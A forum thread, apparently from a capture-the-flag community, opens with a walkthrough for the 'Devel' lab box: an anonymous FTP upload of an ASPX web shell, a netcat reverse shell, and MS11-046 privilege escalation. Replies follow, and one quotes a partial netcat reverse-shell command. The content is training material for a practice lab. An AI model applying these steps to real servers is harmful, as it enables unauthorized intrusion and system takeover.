Metasploitless Devel

PDF with images: https://jdwhitaker.github.io/static/devel.pdf

The Devel box is great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue where the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the system architecture reveals it may have the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the binary yields full system access on the machine.

Methods

Initial Reconnaissance: Port Scanning

We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).

We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.

Web Shell

We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.

Upgrading to a Reverse Shell

We use our web shell to identify the location of the netcat binary we uploaded through ftp.
We run a netcat reverse shell back to our local machine.

Additional Reconnaissance: System Information

The OS Versions is 6.1.7600 N/A Build 7600.

Privilege Escalation

Searching “6.1.7600 N/A Build 7600 privilege escalation” online results in an exploit at https: //www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.

Loot

We search for the flag files and print them.

Nice, thanks.

Question… when using the “Execute” command in the web browser…

Is it typed as entire directory of the uploaded nc.exe? Below example:

C:\inetpub\wwwroot\nc.exe -e cmd

Because when I did this, it didn’t work… because shell back to the machine didn’t catch anything…

@sparkla. It’s good to share here. Rana Khalil from Medium really doing good job on making write-ups without msf. It’s great for learning and understanding how public exploits work.

Hello guys, I’m bumping this ( and created this forum account lol ) just to tell you that the box isn’t broken.

When u’re sending a binary file via FTP don’t forget to turn binary mode ON :smile:

Hope this help you all and have a great day

I’m stuck on the last step as well…I uploaded the malicous aspx file to the site, ran the handler to create a meterpreter session after I browsed to said file, but could not get the kitrap0d exploit to work. I have it set to the correct session number and tun0 lhost (I started today and was stuck on lame for so long because I wasn’t using tun0). I followed 3 different write ups that did the same thing as me. At this point the only way to “try harder” is to ask for help :slight_smile:

btw I was able to get it working the following day. No clue what I did differently, I assume it had something to do with someone else on the box or losing connection to it…even though I restarted it the first time I tried. Who knew the whole try harder thing actually works haha.